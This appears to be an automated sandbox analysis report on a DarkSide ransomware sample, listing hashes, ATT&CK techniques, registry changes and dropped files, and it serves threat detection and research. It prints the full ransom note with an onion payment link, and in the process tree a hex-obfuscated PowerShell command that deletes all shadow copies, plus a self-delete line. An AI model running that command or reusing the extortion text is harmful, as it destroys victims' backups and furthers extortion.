darkside | 80c75581d6e09643a8fc7d7e0fa677e95faa64f20141cf493371ea604f6a07c9

General

Target

sample3.exe
Size

59KB
MD5

943a107b88f85fd88198a9df2e1dc0dd
SHA1

bfcf6050ddba6053b738e0c5e54b105880a3c45a
SHA256

80c75581d6e09643a8fc7d7e0fa677e95faa64f20141cf493371ea604f6a07c9
SHA512

bb179e1deb929502a63d37a19f34808329cb0a5f85618aafcc1eb22ecd91966f12c0033c36a84d966c84dfa86172b0af352e10a086f337f404af34256caacf77
SSDEEP

768:GjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylvD7Y23W58:Dx7Fu4/ihrhDTV1ylbcZ58

Score

10^/10

darkside credential_access defense_evasion discovery execution ransomware spyware stealer

Malware Config

Extracted

Path

C:\Recovery\WindowsRE\README.884ea733.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Darkside family
darkside
Renames multiple (144) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3808	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\884ea733.BMP"	sample3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\884ea733.BMP"	sample3.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sample3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies Control Panel 1 IoCs

defense_evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\WallpaperStyle = "10"	sample3.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.884ea733	sample3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.884ea733\ = "884ea733"	sample3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\884ea733\DefaultIcon	sample3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\884ea733	sample3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\884ea733\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\884ea733.ico"	sample3.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3808	powershell.exe
3808	powershell.exe
4940	sample3.exe
4940	sample3.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4940	sample3.exe
Token: SeSecurityPrivilege	4940	sample3.exe
Token: SeTakeOwnershipPrivilege	4940	sample3.exe
Token: SeLoadDriverPrivilege	4940	sample3.exe
Token: SeSystemProfilePrivilege	4940	sample3.exe
Token: SeSystemtimePrivilege	4940	sample3.exe
Token: SeProfSingleProcessPrivilege	4940	sample3.exe
Token: SeIncBasePriorityPrivilege	4940	sample3.exe
Token: SeCreatePagefilePrivilege	4940	sample3.exe
Token: SeBackupPrivilege	4940	sample3.exe
Token: SeRestorePrivilege	4940	sample3.exe
Token: SeShutdownPrivilege	4940	sample3.exe
Token: SeDebugPrivilege	4940	sample3.exe
Token: SeSystemEnvironmentPrivilege	4940	sample3.exe
Token: SeRemoteShutdownPrivilege	4940	sample3.exe
Token: SeUndockPrivilege	4940	sample3.exe
Token: SeManageVolumePrivilege	4940	sample3.exe
Token: 33	4940	sample3.exe
Token: 34	4940	sample3.exe
Token: 35	4940	sample3.exe
Token: 36	4940	sample3.exe
Token: SeDebugPrivilege	3808	powershell.exe
Token: SeBackupPrivilege	4236	vssvc.exe
Token: SeRestorePrivilege	4236	vssvc.exe
Token: SeAuditPrivilege	4236	vssvc.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 4940 wrote to memory of 3808	4940	sample3.exe	82
PID 4940 wrote to memory of 3808	4940	sample3.exe	82
PID 4940 wrote to memory of 2352	4940	sample3.exe	88
PID 4940 wrote to memory of 2352	4940	sample3.exe	88
PID 4940 wrote to memory of 2352	4940	sample3.exe	88

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\sample3.exe
"C:\Users\Admin\AppData\Local\Temp\sample3.exe"
1⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3808
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\sample3.exe >> NUL
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2352

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

1

T1070

File Deletion

Modify Registry

Credential Access

Credentials from Password Stores

2

T1555

Credentials from Web Browsers

1

T1555.003

Windows Credential Manager

1

T1555.004

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Browser Information Discovery

1

T1217

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\WindowsRE\README.884ea733.TXT

Filesize
1KB

MD5
65494ea6831e577d82fac2b91b9c3d43

SHA1
5c23717d22ee9b94306f2d5a2a53c60aca03eb8c

SHA256
5e98b41a51606e16dda30ad4a49457227f75d71ad2004e2942c6b8de6202c4f3

SHA512
28ba13f7793ac8271af03b26eaeba6cbe707bf1f07fb1792818a6ab270d1c20d0091ef4a10c092f60c373aefe09698d2b470ec6a7f8cfa47103fd8bbb8d7a7bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
aa0a32b11dca7b04f4cc5fe8c55cb357

SHA1
00e354fd0754a7d721a270cdc08f970b9a3f6605

SHA256
e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1

SHA512
1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8f16eb240c6168b41004cca7306484e6

SHA1
da34df40f9b1d5b0f9fd49bd1d467879fb40cb06

SHA256
48c69824555f42932cc2a1272a03be650dde58a10239ba282e9314ec13ed273a

SHA512
96c4a859b024e531124139c28bebd4d6f53de3ae7bc378ea3c7662452525d4020d1a76f851651174418cae620c340e8677516a3a70933b2ff2cce6a71a349063

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_turn12q1.1vp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3808-1-0x00007FFAE80D3000-0x00007FFAE80D5000-memory.dmp

Filesize
8KB

Download
memory/3808-2-0x000001F12F830000-0x000001F12F852000-memory.dmp

Filesize
136KB

Download
memory/3808-11-0x00007FFAE80D0000-0x00007FFAE8B92000-memory.dmp

Filesize
10.8MB

Download
memory/3808-12-0x00007FFAE80D0000-0x00007FFAE8B92000-memory.dmp

Filesize
10.8MB

Download
memory/3808-13-0x00007FFAE80D0000-0x00007FFAE8B92000-memory.dmp

Filesize
10.8MB

Download
memory/3808-16-0x00007FFAE80D0000-0x00007FFAE8B92000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing